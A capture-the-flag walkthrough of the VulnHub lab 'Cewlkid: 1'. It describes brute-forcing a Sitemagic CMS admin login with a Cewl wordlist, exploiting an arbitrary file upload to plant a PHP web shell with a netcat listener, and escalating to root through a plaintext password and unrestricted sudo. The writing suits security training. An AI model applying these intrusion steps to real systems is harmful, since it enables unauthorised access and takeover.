Today, we are going to solve another boot2root challenge called “Cewlkid: 1“. It is available at VulnHub for penetration testing practices and you can download it from here. The commendation of making this lab goes to @iamv1nc3nt. Let’s start and learn how to boot it successfully.
Penetration Testing Methodology
- Brute force login Sitemagic CMS with Burp
- Sitemagic Arbitrary File Upload
- Abuse crontab with plain passwords
- Abuse of sudo
- Capture the flag
We are looking for the IP address of the target machine with netdiscover:
netdiscover -i ethX
Once we have the IP address, the next step is to perform a network scan and so we will use nmap for it as shown in the following image:
nmap -A –p- 192.168.10.183
We ignore the port 80 web service as it is useless to the aforementioned Boot2Root challenge and hop to list a Sitemagic CMS on port 8080.
We review the content and sections, we will find the link to the administration panel of the web application.
With all this information and given that the machine is called “Cewlkid“, it is very clear that we will need to create a dictionary with the tool “Cewl” using the different sections of the web to obtain the possible password.
With the help of Burp suite and using the dictionary we just created, we will perform brute force on the user “admin” (official information default user).
We access the control panel and verify that the credentials are valid.
Inside we can list the exact version of the application and check that there is an exploit to upload arbitrary files.
As always, we will do a proof of concept to verify that the site is vulnerable. And for that, we have captured the following request.
The response for the bove request is the follwoing:
Perfect! We upload the file and see that we have indeed been able to upload the “info.php” file.
We repeat the same steps, but this time we will upload a web shell. (I used pentestmonkey’s)
We put a netcat on the wire and load our “shell.php” file. We will get access to the inside of the machine
Privilege Escalation (Cewlbeans)
There are several users in the system, but using the tool “pspy64” we enumerate that a remote connection is executed from time to time with the user “cewlbeans” where the password appears in plain text.
Privilege Escalation (root)
We authenticate with the user “cewlbeans“, execute the command “sudo -l” and we find the pleasant surprise that we can execute any binary as any user.
Let’s not waste time, we execute a /bin/sh as “root” and read the flag.
Author: David Utón is Penetration Tester and security auditor for Web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contacted on LinkedIn and Twitter.